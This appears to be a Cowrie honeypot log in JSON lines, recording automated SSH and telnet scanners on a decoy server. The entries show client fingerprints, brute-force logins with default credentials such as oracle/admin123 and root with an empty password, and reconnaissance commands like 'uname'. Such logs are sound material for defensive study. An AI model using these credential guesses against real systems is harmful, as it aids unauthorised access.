{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":42978,"dst_ip":"1.2.3.4","dst_port":23,"session":"979163bac808","protocol":"telnet","message":"New connection: 139.59.27.234:42978 (1.2.3.4:23) [session: 979163bac808]","sensor":"my-vps","timestamp":"2025-08-31T04:33:35.179779Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:33:35.739322Z","src_ip":"139.59.27.234","session":"979163bac808"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:33:35.759490Z","src_ip":"139.59.27.234","session":"979163bac808"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54632,"dst_ip":"1.2.3.4","dst_port":22,"session":"87a61827dce0","protocol":"ssh","message":"New connection: 212.227.125.160:54632 (1.2.3.4:22) [session: 87a61827dce0]","sensor":"my-vps","timestamp":"2025-08-31T04:33:35.920062Z"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T04:33:36.038019Z","src_ip":"139.59.27.234","session":"979163bac808"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:33:36.444308Z","src_ip":"212.227.125.160","session":"87a61827dce0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:33:36.445563Z","src_ip":"212.227.125.160","session":"87a61827dce0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:37.265352Z","src_ip":"139.59.27.234","session":"979163bac808"}
{"eventid":"cowrie.session.closed","duration":2.090754508972168,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:37.270464Z","src_ip":"139.59.27.234","session":"979163bac808"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"admin123","message":"login attempt [oracle/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:33:38.290015Z","src_ip":"212.227.125.160","session":"87a61827dce0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34117,"dst_ip":"1.2.3.4","dst_port":23,"session":"abbc4ad15092","protocol":"telnet","message":"New connection: 212.227.125.160:34117 (1.2.3.4:23) [session: abbc4ad15092]","sensor":"my-vps","timestamp":"2025-08-31T04:33:39.326375Z"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:39.646692Z","src_ip":"212.227.125.160","session":"87a61827dce0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:33:40.768461Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:33:40.769248Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"10.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:50.824705Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.session.closed","duration":"88.2","message":"Connection lost after 88.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:50.917249Z","src_ip":"212.227.125.160","session":"dfa2f19b40a8"}
{"eventid":"cowrie.session.closed","duration":12.874401807785034,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:33:52.200703Z","src_ip":"212.227.125.160","session":"abbc4ad15092"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45608,"dst_ip":"1.2.3.4","dst_port":22,"session":"c48b5d607b69","protocol":"ssh","message":"New connection: 212.227.125.160:45608 (1.2.3.4:22) [session: c48b5d607b69]","sensor":"my-vps","timestamp":"2025-08-31T04:33:53.744688Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43420,"dst_ip":"1.2.3.4","dst_port":22,"session":"912c61e77fab","protocol":"ssh","message":"New connection: 212.227.235.229:43420 (1.2.3.4:22) [session: 912c61e77fab]","sensor":"my-vps","timestamp":"2025-08-31T04:34:13.988803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:34:15.049369Z","src_ip":"212.227.235.229","session":"912c61e77fab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:34:15.050132Z","src_ip":"212.227.235.229","session":"912c61e77fab"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"root123","message":"login attempt [oracle/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:34:20.710216Z","src_ip":"212.227.235.229","session":"912c61e77fab"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:34:22.454984Z","src_ip":"212.227.235.229","session":"912c61e77fab"}
{"eventid":"cowrie.session.closed","duration":"30.6","message":"Connection lost after 30.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:34:24.349078Z","src_ip":"212.227.125.160","session":"c48b5d607b69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33344,"dst_ip":"1.2.3.4","dst_port":22,"session":"670023a012fa","protocol":"ssh","message":"New connection: 212.227.125.160:33344 (1.2.3.4:22) [session: 670023a012fa]","sensor":"my-vps","timestamp":"2025-08-31T04:34:35.438202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:34:35.843908Z","src_ip":"212.227.125.160","session":"670023a012fa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:34:35.844726Z","src_ip":"212.227.125.160","session":"670023a012fa"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"root123","message":"login attempt [oracle/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:34:37.331552Z","src_ip":"212.227.125.160","session":"670023a012fa"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:34:38.169799Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:34:39.166811Z","src_ip":"212.227.125.160","session":"670023a012fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54276,"dst_ip":"1.2.3.4","dst_port":22,"session":"64f76fa1ddf8","protocol":"ssh","message":"New connection: 212.227.235.229:54276 (1.2.3.4:22) [session: 64f76fa1ddf8]","sensor":"my-vps","timestamp":"2025-08-31T04:34:42.665516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:34:46.228470Z","src_ip":"212.227.235.229","session":"64f76fa1ddf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:34:46.230287Z","src_ip":"212.227.235.229","session":"64f76fa1ddf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:34:47.972901Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:34:47.973823Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:34:52.278044Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.session.closed","duration":"99.0","message":"Connection lost after 99.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:34:52.279999Z","src_ip":"212.227.235.229","session":"b44b87c0fece"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:35:05.565450Z","src_ip":"212.227.235.229","session":"64f76fa1ddf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41904,"dst_ip":"1.2.3.4","dst_port":22,"session":"861b8f40489d","protocol":"ssh","message":"New connection: 212.227.235.229:41904 (1.2.3.4:22) [session: 861b8f40489d]","sensor":"my-vps","timestamp":"2025-08-31T04:35:12.046924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:12.048121Z","src_ip":"212.227.235.229","session":"861b8f40489d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:35:12.146524Z","src_ip":"212.227.235.229","session":"861b8f40489d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T04:35:12.442573Z","src_ip":"212.227.235.229","session":"861b8f40489d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50482,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4782afdc2b4","protocol":"ssh","message":"New connection: 212.227.235.229:50482 (1.2.3.4:22) [session: d4782afdc2b4]","sensor":"my-vps","timestamp":"2025-08-31T04:35:13.155725Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:13.542506Z","src_ip":"212.227.235.229","session":"861b8f40489d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:14.138096Z","src_ip":"212.227.235.229","session":"d4782afdc2b4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:35:14.139171Z","src_ip":"212.227.235.229","session":"d4782afdc2b4"}
{"eventid":"cowrie.session.closed","duration":"31.7","message":"Connection lost after 31.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:14.409648Z","src_ip":"212.227.235.229","session":"64f76fa1ddf8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"P@ssw0rd123","message":"login attempt [oracle/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:35:19.700789Z","src_ip":"212.227.235.229","session":"d4782afdc2b4"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:21.491663Z","src_ip":"212.227.235.229","session":"d4782afdc2b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57080,"dst_ip":"1.2.3.4","dst_port":22,"session":"467459ff184d","protocol":"ssh","message":"New connection: 212.227.125.160:57080 (1.2.3.4:22) [session: 467459ff184d]","sensor":"my-vps","timestamp":"2025-08-31T04:35:22.056223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:30.908249Z","src_ip":"212.227.125.160","session":"467459ff184d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:35:30.908998Z","src_ip":"212.227.125.160","session":"467459ff184d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40618,"dst_ip":"1.2.3.4","dst_port":22,"session":"396b03d2b118","protocol":"ssh","message":"New connection: 212.227.125.160:40618 (1.2.3.4:22) [session: 396b03d2b118]","sensor":"my-vps","timestamp":"2025-08-31T04:35:34.645948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:35:35.460482Z","src_ip":"212.227.125.160","session":"396b03d2b118"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:35:35.461463Z","src_ip":"212.227.125.160","session":"396b03d2b118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52956,"dst_ip":"1.2.3.4","dst_port":23,"session":"31263c73598b","protocol":"telnet","message":"New connection: 212.227.125.160:52956 (1.2.3.4:23) [session: 31263c73598b]","sensor":"my-vps","timestamp":"2025-08-31T04:35:36.066323Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"P@ssw0rd123","message":"login attempt [oracle/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:35:37.661771Z","src_ip":"212.227.125.160","session":"396b03d2b118"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:35:39.159878Z","src_ip":"212.227.125.160","session":"396b03d2b118"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36330,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ec50a3ab108","protocol":"ssh","message":"New connection: 212.227.235.229:36330 (1.2.3.4:22) [session: 9ec50a3ab108]","sensor":"my-vps","timestamp":"2025-08-31T04:35:45.328967Z"}
{"eventid":"cowrie.session.connect","src_ip":"192.3.96.146","src_port":34880,"dst_ip":"1.2.3.4","dst_port":22,"session":"75d794fbe25f","protocol":"ssh","message":"New connection: 192.3.96.146:34880 (1.2.3.4:22) [session: 75d794fbe25f]","sensor":"my-vps","timestamp":"2025-08-31T04:35:46.448597Z"}
